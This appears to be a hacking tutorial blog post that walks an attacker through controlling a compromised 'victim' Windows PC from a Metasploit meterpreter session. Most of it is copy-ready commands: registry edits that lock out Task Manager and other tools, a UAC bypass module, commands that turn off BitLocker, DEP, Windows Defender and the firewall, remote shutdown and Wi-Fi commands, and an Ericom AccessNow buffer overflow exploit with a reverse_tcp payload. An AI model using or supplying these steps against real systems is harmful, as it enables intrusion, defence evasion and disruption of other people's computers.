Best of Remote Windows PC Hacking Tricks (Part 1)

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How to Disable and Enable services.msc

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 1 /f


To Enable services.msc

REG add "HKCU\Software\Policies\Microsoft\MMC\{58221C66-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 0 /f


How to Disable and Enable Internet Options

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 1 /f


To Enable Internet Options:

REG add "HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v NoBrowserOptions /t REG_DWORD /d 0 /f


How to Disable and Enable Folder Options

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f


To Enable Folder Options:

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 0 /f


How to Disable and Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 1 /f


To Enable Security tab

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v Nosecuritytab /t REG_DWORD /d 0 /f


How to Disable and Enable Group Policy

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f


To Enable Group Policy

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 0 /f


How to Disable and Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f


To Enable Task Manager

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f


How to Disable Registry Editor

REG add  HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

Hack ALL Security Features in Remote Windows 7 PC

Requirement
Attacker: kali Linux
Victim PC: Windows 7

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

How to Disable UAC protection (Get Admin Access)
From Microsoft UAC is a security component that allows an administrator to enter credentials during a non-administrator's user session to perform occasional administrative tasks. UAC also can also require administrators to specifically approve administrative actions or applications before they are allowed to run.

use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1
msf exploit (bypassuac_injection)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (bypassuac_injection)>exploit


Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How to Check Status and disable bitlocker
From Microsoft BitLocker Drive Encryption allows you to encrypt all data stored on the Windows operating system volume and configured data volumes, and by using a Trusted Platform Module.

manage-bde -status C: (If Bit locker is enable use following command)

manage-bde -off C:


How to OFF Date Execution Prevention (DEP)
From Microsoft Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

 bcdedit.exe /set {current} nx AlwaysOff


How to Stop Windows Defender Service
Windows Defender is your first line of defense against spyware and other unwanted software. 

net stop WinDefend


How to Disable Windows Firewall
Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7

netsh firewall set opmode disable

How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Shutdown Remote PC

Shutdown.exe -s





Restart Remote PC

Shutdown.exe -r





Logoff Remote PC

Shutdown.exe -l





Hibernate Remote PC

Shutdown.exe  /h


Hack WIFI Setting of Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Detect list of available Wireless Networks

netsh wlan show networks mode=bssid



How to show available Wireless Network profiles your PC

netsh wlan show profile


How to show the installed Wireless drivers

netsh wlan show drivers


How to disconnect to a Wireless Network

netsh wlan disconnect


Other Commands

Connects to a Wireless Network
netsh wlan connect name=profile name
Saves wlan profiles
netsh wlan export profile name= profile name
show the blocked network
netsh wlan show blockednetworks

Hack Remote Windows PC using Ericom AccessNow Server Buffer Overflow

This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2.

Exploit Targets
Ericom AccessNow Server 2.4.0.2

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole


Now type use exploit/windows/http/ericom_access_now_bof
msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)
msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)
msf exploit (ericom_access_now_bof)>exploit